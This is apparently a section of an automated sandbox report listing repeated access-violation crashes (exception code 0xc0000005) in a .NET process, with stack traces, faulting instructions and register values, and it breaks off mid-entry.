One or more processes crashed (50 out of 52 events)

Time & API	Arguments	Status
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x659a71 0x659873 0x657710 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x659ba8 registers.esp: 3009428 registers.edi: 3009480 registers.eax: 0 registers.ebp: 3009492 registers.edx: 7115288 registers.ebx: 3010924 registers.esi: 45984456 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d80f21 0x4d80d82 0x4d80c55 0x65f2d3 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007668 registers.edi: 3007968 registers.eax: 0 registers.ebp: 3007980 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 46347724 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d814ec 0x4d80d82 0x4d80c55 0x65f2d3 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007956 registers.edi: 3008300 registers.eax: 0 registers.ebp: 3007964 registers.edx: 0 registers.ebx: 3010924 registers.esi: 46347724 registers.ecx: 47597488	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d80f21 0x4d80d82 0x4d80c6d 0x65f2d3 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007668 registers.edi: 3007968 registers.eax: 0 registers.ebp: 3007980 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 46347724 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d814ec 0x4d80d82 0x4d80c6d 0x65f2d3 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007956 registers.edi: 3008300 registers.eax: 0 registers.ebp: 3007964 registers.edx: 0 registers.ebx: 3010924 registers.esi: 46347724 registers.ecx: 49027952	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d80f21 0x4d80d82 0x4d80c6d 0x65f2d3 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007668 registers.edi: 3007968 registers.eax: 0 registers.ebp: 3007980 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 46347724 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d814ec 0x4d80d82 0x4d80c6d 0x65f2d3 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007956 registers.edi: 3008300 registers.eax: 0 registers.ebp: 3007964 registers.edx: 0 registers.ebx: 3010924 registers.esi: 46347724 registers.ecx: 46584944	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85a08 0x4d85859 0x4d80c55 0x65f5bc 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007644 registers.edi: 3007944 registers.eax: 0 registers.ebp: 3007956 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d85f9e 0x4d85859 0x4d80c55 0x65f5bc 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007932 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3007940 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 48019816	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85a08 0x4d85859 0x4d80c6d 0x65f5bc 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007644 registers.edi: 3007944 registers.eax: 0 registers.ebp: 3007956 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d85f9e 0x4d85859 0x4d80c6d 0x65f5bc 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007932 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3007940 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 49611656	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85a08 0x4d85859 0x4d80c6d 0x65f5bc 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007644 registers.edi: 3007944 registers.eax: 0 registers.ebp: 3007956 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d85f9e 0x4d85859 0x4d80c6d 0x65f5bc 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007932 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3007940 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 50961344	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d86342 0x4d86151 0x4d80c55 0x65f6d4 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007696 registers.edi: 3007996 registers.eax: 0 registers.ebp: 3008008 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d867aa 0x4d86151 0x4d80c55 0x65f6d4 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 